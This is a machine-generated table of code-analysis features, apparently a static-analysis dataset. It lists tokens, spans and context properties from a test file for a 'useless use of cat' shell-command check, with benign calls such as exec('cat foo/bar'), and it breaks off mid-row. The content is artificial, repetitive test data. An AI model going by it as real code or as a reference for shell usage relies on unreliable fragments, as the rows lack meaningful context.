autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | exceptional return of console.log(out) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | exceptional return of console.log(out) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:45:130:47 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:45:130:47 | log | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:45:130:47 | log | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:45:130:47 | log | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:45:130:47 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:49:130:51 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:13 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:13 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:13 | exec | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:13 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:13 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exceptional return of exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exceptional return of exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exceptional return of exec("c ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exceptional return of exec("c ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exceptional return of exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:15:133:27 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | 'arguments' object of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | exceptional return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:30:133:61 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:31:133:33 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:31:133:33 | err | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:31:133:33 | err | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:31:133:33 | err | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:31:133:33 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:36:133:38 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:51 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:51 | console | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:51 | console | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:51 | console | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:51 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:55 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:55 | console.log | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:55 | console.log | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:55 | console.log | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:55 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | exceptional return of console.log(out) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | exceptional return of console.log(out) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:53:133:55 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:53:133:55 | log | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:53:133:55 | log | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:53:133:55 | log | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:53:133:55 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:57:133:59 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:7:136:13 | stdout2 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:7:136:13 | stdout2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:7:136:13 | stdout2 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:7:138:2 | stdout2 ... tf8'\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:7:138:2 | stdout2 ... tf8'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:7:138:2 | stdout2 ... tf8'\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:136:24 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:136:24 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:136:24 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | exceptional return of execSyn ... tf8'\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | exceptional return of execSyn ... tf8'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | exceptional return of execSyn ... tf8'\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:26:136:48 | 'cat /e ... q.conf' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:26:136:48 | 'cat /e ... q.conf' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:26:136:48 | 'cat /e ... q.conf' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:26:136:48 | 'cat /e ... q.conf' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:26:136:48 | 'cat /e ... q.conf' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:26:136:48 | 'cat /e ... q.conf' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:10 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:10 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:10 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:18 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:18 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:18 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:18 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:18 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:3:137:18 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:137:13:137:18 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exceptional return of exec('/ ... s) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exceptional return of exec('/ ... s) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exceptional return of exec('/ ... s) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exec('/ ... s) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exec('/ ... s) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exec('/ ... s) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:6:140:15 | '/bin/cat' | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:6:140:15 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:6:140:15 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:6:140:15 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:6:140:15 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:6:140:15 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:17 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:17 | this | enclosingFunctionBody | e s | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:17 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:17 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | 'arguments' object of 